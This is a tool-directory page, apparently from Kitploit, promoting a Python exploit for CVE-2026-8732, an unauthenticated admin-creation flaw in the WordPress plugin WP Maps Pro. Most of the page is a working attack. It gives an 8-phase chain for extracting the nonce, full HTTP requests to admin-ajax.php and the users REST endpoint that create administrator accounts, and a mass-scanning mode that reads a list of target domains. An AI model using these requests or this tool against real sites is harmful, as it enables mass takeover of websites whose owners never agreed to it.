Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-8732 — 针对 CVE-2026-8732 的自动化 8 阶段漏洞利用程序,该漏洞是 WP Maps Pro ≤ 6.1.0 中未经验证的权限提升漏洞。使用 multiprocessing 和 asyncio 来扫描目标、提取 nonces 并创建管理员账户。 | Kitploit
工具/GitHubGitHub/zycoder0day/cve-2026-8732
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubzycoder0day/cve-2026-8732

CVE-2026-8732

针对 CVE-2026-8732 的自动化 8 阶段漏洞利用程序,该漏洞是 WP Maps Pro ≤ 6.1.0 中未经验证的权限提升漏洞。使用 multiprocessing 和 asyncio 来扫描目标、提取 nonces 并创建管理员账户。

查看仓库
244个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚔️ CVE-2026-8732

WP Maps Pro ≤ 6.1.0 — 未认证权限提升

CVSS 9.8 CRITICAL CWE-306 Python 3.8+ License MIT

8 阶段自动化利用 | Multiprocessing + Asyncio | 已验证的管理员创建


🎯 关于漏洞

WordPress 插件 WP Maps Pro 版本 ≤ 6.1.0 存在未认证权限提升漏洞。攻击者无需任何凭据即可创建 administrator 帐户并完全控制网站。

该漏洞源于专为 FlipperCode 供应商支持团队设计的 "Temporary Access" 功能,但该功能在缺乏充分保护的情况下暴露给公众。

信息详情
CVECVE-2026-8732
CVSS9.8(严重)— AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
插件WP Maps Pro (wp-google-map-gold)
供应商FlipperCode
受影响版本≤ 6.1.0
已修补版本6.1.1
类型关键功能缺少身份验证 (CWE-306)
影响未认证创建管理员 → 完全控制网站
PoC 作者XENON1337

🔥 三个相关弱点

┌──────────────────────────────────────────────────────────────┐
│  KELEMAHAN 1 — Endpoint Terekspos Tanpa Autentikasi        │
│  ▸ AJAX action didaftarkan dengan wp_ajax_nopriv_           │
│  ▸ Siapapun bisa mengakses tanpa login                      │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  KELEMAHAN 2 — Nonce Bocor di Halaman Publik               │
│  ▸ Objek wpgmp_local.nonce disematkan di setiap halaman    │
│  ▸ Penyerang bisa mengekstrak nonce dari HTML source        │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  KELEMAHAN 3 — Tidak Ada Pemeriksaan Hak Akses             │
│  ▸ Fungsi callback hanya memverifikasi nonce               │
│  ▸ Tidak ada current_user_can() — tidak ada pertahanan lain│
└──────────────────────────────────────────────────────────────┘

⚡ 攻击链 — 8 阶段

  ┌─────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 1  │──▶│ FASE 2   │──▶│ FASE 3   │──▶│ FASE 4   │
  │ RESOLVE │   │ CHECK WP │   │ DETECT   │   │ VERSION  │
  │ HTTPS?  │   │ wp-content│   │ PLUGIN   │   │ ≤6.1.0?  │
  │ HTTP?   │   │ wp-login  │   │ wpgmp_   │   │ WAF?     │
  └─────────┘   └──────────┘   └──────────┘   └─────┬────┘
                                                      │ RENTAN
                                                      ▼
  ┌──────────────────────────────────────────────────────────┐
  │                    FASE 5 — EKSTRAKSI NONCE               │
  │                                                          │
  │  GRUP A (API)          GRUP B (Konten)      GRUP C      │
  │  ├─ M1: REST pages    ├─ M4: Sitemap XML   └─ M7: Slug  │
  │  ├─ M2: REST search   ├─ M5: Homepage links    Brute    │
  │  └─ M3: rest_route    └─ M6: RSS/Atom feed   Force     │
  │                                                          │
  │  Target: wpgmp_local.nonce = "fc-call-nonce"             │
  └──────────────────────────┬───────────────────────────────┘
                             │ NONCE DITEMUKAN
                             ▼
  ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 6   │──▶│ FASE 7   │──▶│ FASE 8   │
  │ EXPLOIT  │   │ VERIFY   │   │ ADD ADMIN│
  │ POST AJAX│   │ Magic URL│   │ PERMANEN │
  │ nonce+   │   │ Cookie   │   │ REST API │
  │ check_   │   │ login    │   │ WP-Admin │
  │ temp=false│   │ check    │   │ Form     │
  └──────────┘   └──────────┘   └──────────┘
                                       │
                                       ▼
                               ✅ ADMIN DIBUAT
                               Login: wp_xxxx / pass
                               Role: administrator

各阶段详情

阶段名称功能请求数
1Resolve并行选择 HTTPS/HTTP1
2Check WP验证目标是否为 WordPress0
3Detect Plugin在 3 个层面检查 WP Maps 特征0-4
4Version + WAF读取 readme.txt / CSS ?ver= + 检测 WAF1
5Nonce 提取3 个并行组共 7 种搜索方法0-150
6漏洞利用POST admin-ajax.php → 创建临时管理员帐户1
7验证访问 magic URL → 确认管理员会话2
8添加管理员REST API(主要)+ WP-Admin 表单(备用)4

🛠️ 攻击方法

方法 1:核心利用 — 未认证创建管理员

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpgmp_temp_access_ajax
nonce=<EKSTRAKSI_NONCE>
check_temp=false

若存在漏洞,响应为:

{"url":"https://target.com/?wpgmp_access=abc123def456"}

该 Magic URL 会以 fc_user_XXXXX(角色:administrator)的身份提供自动登录。

方法 2:通过 REST API 永久添加管理员

POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json

{
  "username": "wp_xxxxxxxx",
  "email": "user@localhost",
  "password": "Str0ng!Pass#2026",
  "roles": ["administrator"]
}

方法 3:通过 WP-Admin 表单添加管理员(备用)

POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded

user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1                       <-- KUNCI: konfirmasi password lemah
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>

关键点: 必须包含 pw_weak=1 — 没有此参数,WordPress 会拒绝弱密码。


📐 架构

CVE-2026-8732.py
│
├── 📦 NonceFinder — Pencari nonce dengan 7 metode
│   ├── Grup A (API): M1 REST pages, M2 REST search, M3 rest_route
│   ├── Grup B (Konten): M4 Sitemap, M5 Homepage links, M6 RSS feed
│   └── Grup C (Paksa): M7 Slug brute force (30+ slug umum)
│
├── ⚔️ Exploiter — Mesin eksploitasi 8 fase
│   ├── resolve()           → Fase 1: Pemilihan protokol
│   ├── check_wp()           → Fase 2: Verifikasi WordPress
│   ├── detect_plugin()      → Fase 3: Deteksi plugin + early nonce
│   ├── detect_version()     → Fase 4: Deteksi versi + WAF
│   ├── exploit()            → Fase 6: Eksploitasi inti
│   ├── verify()             → Fase 7: Verifikasi login admin
│   └── add_admin()          → Fase 8: Tambah admin permanen
│
├── 🔧 Worker Process — Proses pekerja multiprocessing
│   ├── producer()           → Baca domain dari mp.Queue
│   └── consumer() (N)       → Eksekusi scan paralel
│
└── 🖥️ Scanner — Antarmuka pengguna
    ├── single()             → Mode target tunggal (interaktif)
    └── multi()              → Mode multi-target (massal)

数据流

  targets.txt          mp.Queue (tugas)         asyncio.Queue
  ┌─────────┐    ┌─────────────────┐    ┌──────────────────┐
  │ domain1 │───▶│  domain queue   │───▶│  internal queue  │
  │ domain2 │    │  (IPC antara    │    │  (per proses)    │
  │ domain3 │    │   proses)       │    └────────┬─────────┘
  │  ...    │    └─────────────────┘              │
  └─────────┘                          ┌─────────▼──────────┐
                                       │   Konsumen (N)      │
                                       │   Exploiter.scan()  │
                                       │   8 fase lengkap    │
                                       └─────────┬──────────┘
                                                 │
                                       ┌─────────▼──────────┐
                                       │  mp.Queue (hasil)   │──▶ vuln.txt
                                       │  + JSON + TXT       │    + debug.log
                                       └────────────────────┘

🚀 使用方法

安装

pip install aiohttp

单目标模式

python3 CVE-2026-8732.py
  [?] Pilih mode:
      1. Single Target
      2. Multi Target (file list)

  > 1

  [?] Target domain (tanpa http/https): target.com
  [?] Timeout [default: 15]: 15

多目标模式(批量)

下载工具